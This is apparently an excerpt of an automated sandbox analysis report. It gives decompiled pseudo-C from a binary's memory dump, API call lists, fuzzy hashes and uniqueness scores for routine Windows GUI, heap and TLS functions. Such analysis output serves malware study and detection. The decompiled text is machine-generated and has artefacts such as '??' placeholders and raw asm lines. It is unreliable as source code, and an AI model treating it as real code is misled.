				_t55 =  *((intOrPtr*)(E0042083D(__ebx, __edi, _t54, __eflags) + 4));
				if(_t55 != 0 && _a8 != 0) {
					_t48 = _a8 >> 0x10;
					if(_t48 != 0) {
						_t28 =  *(_t55 + 0x90) & 0x0000ffff;
						if(_a8 == _t28 && _t48 ==  *(_t55 + 0x92)) {
							_push(__ebx);
							_push(__edi);
							GlobalGetAtomNameW(_t28,  &_v528, 0x103);
							GlobalAddAtomW( &_v528);
							GlobalGetAtomNameW( *(_t55 + 0x92) & 0x0000ffff,  &_v528, 0x103);
							GlobalAddAtomW( &_v528);
							SendMessageW(_v532, 0x3e4,  *(_v536 + 0x20), ( *(_t55 + 0x92) & 0x0000ffff) << 0x00000010 |  *(_t55 + 0x90) & 0x0000ffff);
							_pop(_t52);
							_pop(_t42);
						}
					}
				}
				_pop(_t56);
				return E00427DFF(0, _t42, _v8 ^ _t58, _t51, _t52, _t56);
			}

















                  0x004167e7
                  0x004167e7
                  0x004167e7
                  0x004167ea
                  0x004167f2
                  0x004167f9
                  0x004167ff
                  0x00416800
                  0x00416806
                  0x00416811
                  0x00416816
                  0x0041682a
                  0x00416830
                  0x00416836
                  0x00416841
                  0x0041684c
                  0x0041684d
                  0x00416861
                  0x00416870
                  0x00416886
                  0x0041688f
                  0x004168b9
                  0x004168bf
                  0x004168c0
                  0x004168c0
                  0x00416841
                  0x00416830
                  0x004168c8
                  0x004168cf

                  APIs
                  • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 00416861
                  • GlobalAddAtomW.KERNEL32(?), ref: 00416870
                  • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 00416886
                  • GlobalAddAtomW.KERNEL32(?), ref: 0041688F
                  • SendMessageW.USER32(?,000003E4,?,?), ref: 004168B9
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AtomGlobal$Name$MessageSend
                  • String ID:
                  • API String ID: 1515195355-0
                  • Opcode ID: 29d717807fa5eeaad5de7a24922560dc45065d342d5ea1433e51b370e337bfb0
                  • Instruction ID: 0223c1e0545b926e36b923c21b22c10fa7ba75f6f6dc1c9a7f5113cf425a893b
                  • Opcode Fuzzy Hash: 29d717807fa5eeaad5de7a24922560dc45065d342d5ea1433e51b370e337bfb0
                  • Instruction Fuzzy Hash: 94216271901218AADB20EF69D888BEAB7F8FF18700F41449AF55997181D778DE84CB54
                  Uniqueness

                  Uniqueness Score: 0.57%

                  Function 0041934C, Relevance: 7.6, APIs: 5, Instructions: 60windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041934C(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t24;
				unsigned int _t34;
				void* _t46;

				_t46 = __ecx;
				if(IsWindow( *(__ecx + 0x20)) == 0) {
					 *(_t46 + 0xb0) = _a4;
					 *(_t46 + 0xb4) = _a8;
					 *(_t46 + 0xa8) = _a12;
					_t24 = _a16;
					 *(_t46 + 0xac) = _t24;
					return _t24;
				}
				SendMessageW( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageW( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				if( *0x44be94 >= 0x60000) {
					_t34 = SendMessageW( *(_t46 + 0x20), 0x43a, 0, 0);
					 *(_t46 + 0xb0) = _t34 & 0x0000ffff;
					 *(_t46 + 0xb4) = _t34 >> 0x10;
				}
				return InvalidateRect( *(_t46 + 0x20), 0, 1);
			}






                  0x00419352
                  0x0041935f
                  0x004193da
                  0x004193e3
                  0x004193ec
                  0x004193f2
                  0x004193f5
                  0x00000000
                  0x004193f5
                  0x00419382
                  0x0041939b
                  0x004193a7
                  0x004193b3
                  0x004193bb
                  0x004193c1
                  0x004193c1
                  0x00000000

                  APIs
                  • IsWindow.USER32(?), ref: 00419357
                  • SendMessageW.USER32(?,00000420,00000000,004067C9), ref: 00419382
                  • SendMessageW.USER32(?,0000041F,00000000,?), ref: 0041939B
                  • SendMessageW.USER32(?,0000043A,00000000,00000000), ref: 004193B3
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004193CD
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateRectWindow
                  • String ID:
                  • API String ID: 3225880595-0
                  • Opcode ID: 9af390a8ecad5481a4b659e189a4c7134cd6d35ed7579780a7988a569e019a23
                  • Instruction ID: 101ffce84f5f284ade85b2655d22097d4b946a2c00a2f5c631093cb60535d383
                  • Opcode Fuzzy Hash: 9af390a8ecad5481a4b659e189a4c7134cd6d35ed7579780a7988a569e019a23
                  • Instruction Fuzzy Hash: 3A11E9B1100718AFE7108F29DC84ABBB7E9FB48755F00452AF9DAC6261D7B0EC50DB65
                  Uniqueness

                  Uniqueness Score: 1.69%

                  Function 004208C1, Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E004208C1(void* __ecx, void* __edx, struct HWND__* _a4, WCHAR* _a8) {
				signed int _v8;
				char _v518;
				short _v520;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t23;
				void* _t24;
				void* _t25;
				void* _t28;
				int _t30;
				void* _t31;
				WCHAR* _t33;
				void* _t34;
				signed int _t38;

				_t28 = __edx;
				_t25 = __ecx;
				_t36 = _t38;
				_t9 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t9 ^ _t38;
				_t23 = _a4;
				_t33 = _a8;
				if(_t23 == 0) {
					L2:
					E00413DD0(_t25);
				}
				if(_t33 == 0) {
					goto L2;
				}
				_t30 = lstrlenW(_t33);
				_v520 = 0;
				E004281D0(_t30,  &_v518, 0, 0x1fe);
				if(_t30 > 0x100 || GetWindowTextW(_t23,  &_v520, 0x100) != _t30 || lstrcmpW( &_v520, _t33) != 0) {
					_t17 = SetWindowTextW(_t23, _t33);
				}
				_pop(_t31);
				_pop(_t34);
				_pop(_t24);
				return E00427DFF(_t17, _t24, _v8 ^ _t36, _t28, _t31, _t34);
			}




















                  0x004208c1
                  0x004208c1
                  0x004208c4
                  0x004208cc
                  0x004208d3
                  0x004208d7
                  0x004208db
                  0x004208e1
                  0x004208e3
                  0x004208e3
                  0x004208e3
                  0x004208ea
                  0x00000000
                  0x00000000
                  0x004208f3
                  0x004208fd
                  0x0042090b
                  0x0042091a
                  0x00420943
                  0x00420943
                  0x0042094c
                  0x0042094d
                  0x00420950
                  0x00420957

                  APIs
                  • lstrlenW.KERNEL32(?,00000000,0044B1B0,?), ref: 004208ED
                  • _memset.LIBCMT ref: 0042090B
                  • GetWindowTextW.USER32(00000104,?,00000100), ref: 00420925
                  • lstrcmpW.KERNEL32(?,?), ref: 00420937
                  • SetWindowTextW.USER32(00000104,?), ref: 00420943
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                  • String ID:
                  • API String ID: 289641511-0
                  • Opcode ID: 54357dcbbb036a46dd303e13e8abc5eea3e83e89d7dba8016e5c7abb3c8778c1
                  • Instruction ID: db58640a3672f31761ff3a36ee070ed53be501f73f13427cb5e152126002881c
                  • Opcode Fuzzy Hash: 54357dcbbb036a46dd303e13e8abc5eea3e83e89d7dba8016e5c7abb3c8778c1
                  • Instruction Fuzzy Hash: 300188B6701228A7DB10EB65EC88DDF73ACEF44750F404066F916D3242EA749D448BA9
                  Uniqueness

                  Uniqueness Score: 1.31%

                  Function 00415EF5, Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00415EF5(void* __ecx) {
				struct tagMSG _v32;
				void* __ebp;
				void* _t9;
				void* _t13;
				void* _t26;

				_t26 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x68)) != 0) {
					if(PeekMessageW( &_v32,  *(__ecx + 0x20), 0x367, 0x367, 3) == 0) {
						PostMessageW( *(_t26 + 0x20), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(_t26 + 0x20)) {
						ReleaseCapture();
					}
					_t13 = E0040ED5B(_t26);
					if(_t13 == 0) {
						_t13 = E00413DD0(0);
					}
					 *((intOrPtr*)(_t26 + 0x68)) = 0;
					 *((intOrPtr*)(_t13 + 0x68)) = 0;
					return PostMessageW( *(_t26 + 0x20), 0x36a, 0, 0);
				}
				return _t9;
			}








                  0x00415efe
                  0x00415f04
                  0x00415f26
                  0x00415f30
                  0x00415f30
                  0x00415f3b
                  0x00415f3d
                  0x00415f3d
                  0x00415f45
                  0x00415f4e
                  0x00415f50
                  0x00415f50
                  0x00415f57
                  0x00415f5f
                  0x00000000
                  0x00415f68
                  0x00415f6b

                  APIs
                  • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 00415F18
                  • PostMessageW.USER32(?,00000367,00000000,00000000), ref: 00415F30
                  • GetCapture.USER32 ref: 00415F32
                  • ReleaseCapture.USER32 ref: 00415F3D
                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00415F65
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Message$CapturePost$PeekRelease
                  • String ID:
                  • API String ID: 1125932295-0
                  • Opcode ID: b4efaf5bf7a7d62b4cd52e50aabfed2fe0d1a9a570ed75070f108986fe1d223b
                  • Instruction ID: 98ce2f8058313793ab154f956a24899c7494b88785dc1d587778baef9f87d411
                  • Opcode Fuzzy Hash: b4efaf5bf7a7d62b4cd52e50aabfed2fe0d1a9a570ed75070f108986fe1d223b
                  • Instruction Fuzzy Hash: EC01A731640600AFE7256B21DC4DF9B76ACFBD4704F10052EF085922A1E664E891C669
                  Uniqueness

                  Uniqueness Score: 0.58%

                  Function 00428397, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 41%
                  			E00428397(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x447b38);
				_t8 = E00429338(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0042937D(_t8);
				}
				if( *0x451924 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x45024c, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00429429(_t31);
						 *_t10 = E004293E7(GetLastError());
					}
					goto L9;
				}
				E0042EACE(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0042EB01(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0042EB31();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E004283ED();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                  0x00428397
                  0x00428399
                  0x0042839e
                  0x004283a3
                  0x004283a8
                  0x0042841f
                  0x00428424
                  0x00428424
                  0x004283b1
                  0x004283f6
                  0x004283f7
                  0x004283ff
                  0x00428405
                  0x00428407
                  0x00428409
                  0x0042841c
                  0x0042841e
                  0x00000000
                  0x00428407
                  0x004283b5
                  0x004283bb
                  0x004283c0
                  0x004283c6
                  0x004283cb
                  0x004283cd
                  0x004283ce
                  0x004283cf
                  0x004283d5
                  0x004283d6
                  0x004283dd
                  0x004283e6
                  0x00000000
                  0x004283e8
                  0x004283e8
                  0x00000000
                  0x004283e8

                  APIs
                  • __lock.LIBCMT ref: 004283B5
                    • Part of subcall function 0042EACE: __mtinitlocknum.LIBCMT ref: 0042EAE4
                    • Part of subcall function 0042EACE: __amsg_exit.LIBCMT ref: 0042EAF0
                    • Part of subcall function 0042EACE: EnterCriticalSection.KERNEL32(?,?,?,00430446,00000004,00447EC8,0000000C,004313E6,8007000E,?,00000000,00000000,00000000,?,0042C30C,00000001), ref: 0042EAF8
                  • ___sbh_find_block.LIBCMT ref: 004283C0
                  • ___sbh_free_block.LIBCMT ref: 004283CF
                  • HeapFree.KERNEL32(00000000,8007000E,00447B38), ref: 004283FF
                  • GetLastError.KERNEL32(?,00430446,00000004,00447EC8,0000000C,004313E6,8007000E,?,00000000,00000000,00000000,?,0042C30C,00000001,00000214), ref: 00428410
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 2714421763-0
                  • Opcode ID: 4a0ae1f230bfdf4cb4b700a67d22753b74f7cce4a4be136bfb0388f71fbc42e9
                  • Instruction ID: 8a61b73c84332c3ff3313b341e7b1ee2e10918b1382162b7dde692dc9be26f67
                  • Opcode Fuzzy Hash: 4a0ae1f230bfdf4cb4b700a67d22753b74f7cce4a4be136bfb0388f71fbc42e9
                  • Instruction Fuzzy Hash: 97018831A02332ABDB20BB72BC0A75E7754AF00714F90411FF554661D2DF3D9941CA9D
                  Uniqueness

                  Uniqueness Score: 0.08%

                  Function 0041F65C, Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041F65C(long* __ecx) {
				intOrPtr _t4;
				long _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t4 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t4 + 4));
						E0041F4A6(__ecx, _t4, 0);
						_t4 = _t14;
					} while (_t14 != 0);
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					TlsFree(_t5);
				}
				_t6 = _t15[4];
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection( &(_t15[7]));
				return _t6;
			}









                  0x0041f65f
                  0x0041f661
                  0x0041f667
                  0x0041f669
                  0x0041f669
                  0x0041f671
                  0x0041f676
                  0x0041f678
                  0x0041f669
                  0x0041f67c
                  0x0041f681
                  0x0041f684
                  0x0041f684
                  0x0041f68a
                  0x0041f68f
                  0x0041f698
                  0x0041f69b
                  0x0041f6a2
                  0x0041f6a2
                  0x0041f6ac
                  0x0041f6b4

                  APIs
                  • TlsFree.KERNEL32(?,?,?,0041F6C2), ref: 0041F684
                  • GlobalHandle.KERNEL32(?), ref: 0041F692
                  • GlobalUnlock.KERNEL32(00000000,?,?,0041F6C2), ref: 0041F69B
                  • GlobalFree.KERNEL32(00000000), ref: 0041F6A2
                  • DeleteCriticalSection.KERNEL32(?,?,?,0041F6C2), ref: 0041F6AC
                    • Part of subcall function 0041F4A6: EnterCriticalSection.KERNEL32(?), ref: 0041F505
                    • Part of subcall function 0041F4A6: LeaveCriticalSection.KERNEL32(?,?), ref: 0041F515
                    • Part of subcall function 0041F4A6: LocalFree.KERNEL32(?), ref: 0041F51E
                    • Part of subcall function 0041F4A6: TlsSetValue.KERNEL32(?,00000000), ref: 0041F530
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                  • String ID:
                  • API String ID: 1549993015-0
                  • Opcode ID: 4694f139a3858295dad6e7ed2df73345daba2a417a8b32e9933219b7dc19dac3
                  • Instruction ID: f63cb34b95f37eb13b6fd49b4fa72bdfaccb7d5bba2307145e3ab085466c47aa
                  • Opcode Fuzzy Hash: 4694f139a3858295dad6e7ed2df73345daba2a417a8b32e9933219b7dc19dac3
                  • Instruction Fuzzy Hash: A0F089722405005BC7209B7CAC4CEAB36A9AFD97617190639F855D3360CB39DC57876D
                  Uniqueness

                  Uniqueness Score: 0.28%

                  Function 0041A00F, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 320UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 69%
                  			E0041A00F(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t185;
				signed char _t187;
				intOrPtr* _t189;
				signed char _t193;
				signed int _t196;
				intOrPtr* _t210;
				intOrPtr _t213;
				intOrPtr* _t214;
				signed int _t224;
				signed int _t231;
				intOrPtr* _t233;
				void* _t244;
				signed int _t258;
				signed int _t264;
				signed int _t273;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t281;
				intOrPtr _t282;
				intOrPtr* _t286;
				void* _t290;
				signed int _t291;
				intOrPtr* _t293;

				_t281 = _a4;
				_push(0);
				_t233 = __ecx;
				_push(0);
				_push(0x418);
				_v8 = 0;
				 *_t281 = 0;
				 *((intOrPtr*)(_t281 + 4)) = 0;
				 *((intOrPtr*)( *__ecx + 0x118))();
				_v16 = 0;
				if(0 != 0) {
					_t276 = 0x14;
					_t277 = 0 * _t276 >> 0x20;
					_t185 = E0040B71F(0,  ~0x00BADBAD | 0 * _t276);
					_t290 = 0;
					_v8 = _t185;
					if(_v16 > 0) {
						_t282 = _t185;
						do {
							E00418DC4(_t233, _t290, _t282);
							_t290 = _t290 + 1;
							_t282 = _t282 + 0x14;
						} while (_t290 < _v16);
						_t291 = _v16;
						_t281 = _a4;
						_t244 = 0;
						if(_t291 > 0) {
							_t187 =  *(_t233 + 0x84);
							if((_t187 & 0x00000002) == 0) {
								_t277 = _t187 & 0x00000004;
								if((_t187 & 0x00000004) == 0) {
									L20:
									asm("sbb eax, eax");
									_push(_t244);
									_t224 =  ~(_a8 & 2) & 0x00007fff;
									__eflags = _t224;
									_push(_t224);
								} else {
									if((_a8 & 0x00000004) == 0) {
										__eflags = _a8 & 0x00000008;
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t187 & 0x00000001;
													if((_t187 & 0x00000001) != 0) {
														goto L8;
													} else {
														goto L20;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t233 + 0x148))( &_v48, _a8 & 0x00000002);
													_t231 = _a8 & 0x00000020;
													__eflags = _t231;
													if(_t231 == 0) {
														_t273 = _v48.right - _v48.left;
														__eflags = _t273;
													} else {
														_t273 = _v48.bottom - _v48.top;
													}
													_push(_t231);
													_t244 = _t273 + _a12;
													goto L13;
												}
											} else {
												_push(0);
												L13:
												_push(_t244);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									} else {
										L8:
										_push(_t244);
										_push( *((intOrPtr*)(_t233 + 0x70)));
									}
								}
								_push(_t291);
								_push(_v8);
								E0041978A(_t233, _t277);
							}
							_t189 = E00419658(_t233,  &(_v48.right), _v8, _t291);
							 *_t281 =  *_t189;
							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
							if((_a8 & 0x00000040) != 0) {
								_v24 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t233 + 0xa4));
								 *((intOrPtr*)(_t233 + 0xa4)) = 0;
								if(_t291 > 0) {
									_t210 = _v8 + 4;
									_v28 = _t210;
									_t258 = _t291;
									do {
										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
											_a12 = _a12 + 1;
										}
										_t210 = _t210 + 0x14;
										_t258 = _t258 - 1;
									} while (_t258 != 0);
									_t314 = _a12 - _t258;
									if(_a12 > _t258) {
										_t278 = 0x18;
										_t213 = E0040B71F(_t314,  ~(_t258 & 0xffffff00 | _t314 > 0x00000000) | _a12 * _t278);
										_t73 = _t213 + 8; // 0x8
										_t286 = _t73;
										_v24 = _t213;
										_t214 = _v28;
										_v32 = _a12;
										_t264 = 0;
										_a12 = 0;
										_v12 = 0;
										_v20 = _t286;
										_v28 = _t214;
										while(1) {
											_t277 = _v32;
											if(_a12 >= _v32) {
												break;
											}
											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
												 *((intOrPtr*)(_t286 - 8)) = _t264;
												_t277 =  &_v64;
												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
												 *((intOrPtr*)( *_t233 + 0x184))(_t264,  &_v64);
												E0041453D(_t233,  &_v64);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t264 = _v12;
												_t214 = _v28;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t286 = _v20;
											}
											_t264 = _t264 + 1;
											_t214 = _t214 + 0x14;
											_v12 = _t264;
											_v28 = _t214;
											if(_t264 < _v16) {
												continue;
											}
											break;
										}
										_t291 = _v16;
										_t281 = _a4;
									}
								}
								_t193 =  *(_t233 + 0x84);
								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t233 + 0x70)) =  *_t281;
								}
								_v12 = _v12 & 0x00000000;
								_t323 = _t291;
								if(_t291 > 0) {
									_v20 = _v8;
									do {
										E00419453(_t233, _t277, _t323, _v12, _v20);
										_v12 = _v12 + 1;
										_v20 = _v20 + 0x14;
									} while (_v12 < _t291);
								}
								if(_a12 > 0) {
									_t293 = _v24 + 8;
									_v20 = _t293;
									do {
										_t196 = E00411CF8(_t233,  *((intOrPtr*)(_t293 - 4)));
										_v32 = _t196;
										if(_t196 != 0) {
											GetWindowRect( *(_t196 + 0x20),  &_v64);
											 *((intOrPtr*)( *_t233 + 0x184))( *((intOrPtr*)(_v20 - 8)),  &_v64);
											E00411EB6(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
											_t293 = _v20;
											_t281 = _a4;
										}
										_t293 = _t293 + 0x18;
										_t142 =  &_a12;
										 *_t142 = _a12 - 1;
										_t329 =  *_t142;
										_v20 = _t293;
									} while ( *_t142 != 0);
									E0040B74E(_t233, _t281, _t293, _t329, _v24);
								}
								 *((intOrPtr*)(_t233 + 0xa4)) = _v48.bottom;
							}
							E0040B74E(_t233, _t281, _t291, _t329, _v8);
						}
					}
				}
				SetRectEmpty( &_v64);
				 *((intOrPtr*)( *_t233 + 0x148))( &_v64, _a8 & 0x00000002);
				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
				 *_t281 =  *_t281 + _v64.left - _v64.right;
				E004230B9( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t181 =  *_t281;
				if(_t181 <= _v48.right) {
					_t181 = _v48.right;
				}
				 *_t281 = _t181;
				_t182 =  *((intOrPtr*)(_t281 + 4));
				if(_t182 <= _v48.bottom) {
					_t182 = _v48.bottom;
				}
				 *((intOrPtr*)(_t281 + 4)) = _t182;
				return _t281;
			}









































                  0x0041a01c
                  0x0041a01f
                  0x0041a020
                  0x0041a024
                  0x0041a025
                  0x0041a02a
                  0x0041a02d
                  0x0041a02f
                  0x0041a032
                  0x0041a03c
                  0x0041a041
                  0x0041a049
                  0x0041a04a
                  0x0041a054
                  0x0041a059
                  0x0041a05f
                  0x0041a062
                  0x0041a068
                  0x0041a06a
                  0x0041a06e
                  0x0041a073
                  0x0041a074
                  0x0041a077
                  0x0041a07c
                  0x0041a07f
                  0x0041a082
                  0x0041a086
                  0x0041a08c
                  0x0041a094
                  0x0041a09c
                  0x0041a09f
                  0x0041a10c
                  0x0041a116
                  0x0041a118
                  0x0041a119
                  0x0041a119
                  0x0041a11e
                  0x0041a0a1
                  0x0041a0a5
                  0x0041a0ad
                  0x0041a0b1
                  0x0041a0bb
                  0x0041a0bf
                  0x0041a0c5
                  0x0041a0c9
                  0x0041a108
                  0x0041a10a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041a0cb
                  0x0041a0cf
                  0x0041a0e4
                  0x0041a0ed
                  0x0041a0ed
                  0x0041a0f0
                  0x0041a0fd
                  0x0041a0fd
                  0x0041a0f2
                  0x0041a0f5
                  0x0041a0f5
                  0x0041a100
                  0x0041a104
                  0x00000000
                  0x0041a104
                  0x0041a0c1
                  0x0041a0c1
                  0x0041a0c2
                  0x0041a0c2
                  0x0041a0c2
                  0x0041a0b3
                  0x0041a0b3
                  0x0041a0b4
                  0x0041a0b4
                  0x0041a0a7
                  0x0041a0a7
                  0x0041a0a7
                  0x0041a0a8
                  0x0041a0a8
                  0x0041a0a5
                  0x0041a11f
                  0x0041a120
                  0x0041a125
                  0x0041a125
                  0x0041a134
                  0x0041a142
                  0x0041a144
                  0x0041a147
                  0x0041a157
                  0x0041a15a
                  0x0041a15d
                  0x0041a160
                  0x0041a166
                  0x0041a16f
                  0x0041a172
                  0x0041a175
                  0x0041a177
                  0x0041a17b
                  0x0041a182
                  0x0041a182
                  0x0041a185
                  0x0041a188
                  0x0041a188
                  0x0041a18b
                  0x0041a18e
                  0x0041a199
                  0x0041a1a4
                  0x0041a1ad
                  0x0041a1ad
                  0x0041a1b0
                  0x0041a1b3
                  0x0041a1b6
                  0x0041a1b9
                  0x0041a1bb
                  0x0041a1be
                  0x0041a1c1
                  0x0041a1c4
                  0x0041a1c7
                  0x0041a1c7
                  0x0041a1cd
                  0x00000000
                  0x00000000
                  0x0041a1d3
                  0x0041a1da
                  0x0041a1df
                  0x0041a1e3
                  0x0041a1eb
                  0x0041a1f7
                  0x0041a1fc
                  0x0041a1ff
                  0x0041a203
                  0x0041a206
                  0x0041a20c
                  0x0041a20d
                  0x0041a20e
                  0x0041a20f
                  0x0041a210
                  0x0041a210
                  0x0041a213
                  0x0041a214
                  0x0041a21a
                  0x0041a21d
                  0x0041a220
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041a220
                  0x0041a222
